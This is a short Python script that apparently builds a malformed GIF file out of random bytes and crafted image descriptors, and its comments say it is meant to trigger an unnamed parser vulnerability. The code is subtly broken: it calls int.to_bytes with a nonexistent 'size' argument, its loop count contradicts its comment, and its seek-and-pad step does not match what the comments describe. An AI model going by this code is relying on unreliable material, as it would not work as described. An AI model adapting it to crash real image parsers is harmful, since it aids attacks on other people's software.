#!/usr/bin/env python3

import struct
from typing import BinaryIO

# Generates a random GIF file into `out` using the
# given RNG as source of randomness. This is mainly here to show
# that the vulnerability can be triggered by a crafted
# framedata field in an image descriptor
def generate_random_gif(
        rng: BinaryIO, out: BinaryIO
    ):
    header = b'GIF89a'
    datalen = int.from_bytes(
            rng.read(3), byteorder='big')
    data = rng.read(datalen)

    # Write the header and all bytes preceding the first descriptor
    print('Writing the header', end='', flush=True)
    out.write(header + data[:10])
    print(' done.', flush=True)

    # Now we're going to write 256 descriptors at once
    for i in range(257):
        print(f'Generating descriptor #{i}', end='\r', flush=True)
        
        fwidth = rng.read(2)
        fheight = rng.read(2)
        tcoloridx = rng.read(1)
        lctflag = rng.read(1)
        interlace = rng.read(1)
        sortflag = rng.read(1)
        reserved = rng.read(3)
        xoffset = rng.read(2)
        yoffset = rng.read(2)

        if i!= 256:
            framedata = out.tell().to_bytes(
                    size=2, byteorder='little'
                ) + fwidth + fheight + \
                        tcoloridx + b'\x00' + \
                        lctflag + interlace + \
                        sortflag + reserved + \
                        xoffset + yoffset

            out.write(framedata)
            out.flush()
    
    last_byte = out.tell() - 1
    print(f'The generated gif is {last_byte} bytes long.')

    # For now we'll hardcode the number of loops to use, since we don't
    # yet know how much space remains between the final descriptor and EOF
    numloops = 0xC0

    paddinglen = (numloops * 3).to_bytes(size=2, byteorder='little')

    # Write the leftover bytes before the last descriptor
    print('\nWriting remaining bytes', end='', flush=True)
    out.seek(-1, 2)
    out.write(paddinglen)
    out.write(struct.pack('<B', numloops))
    out.flush()
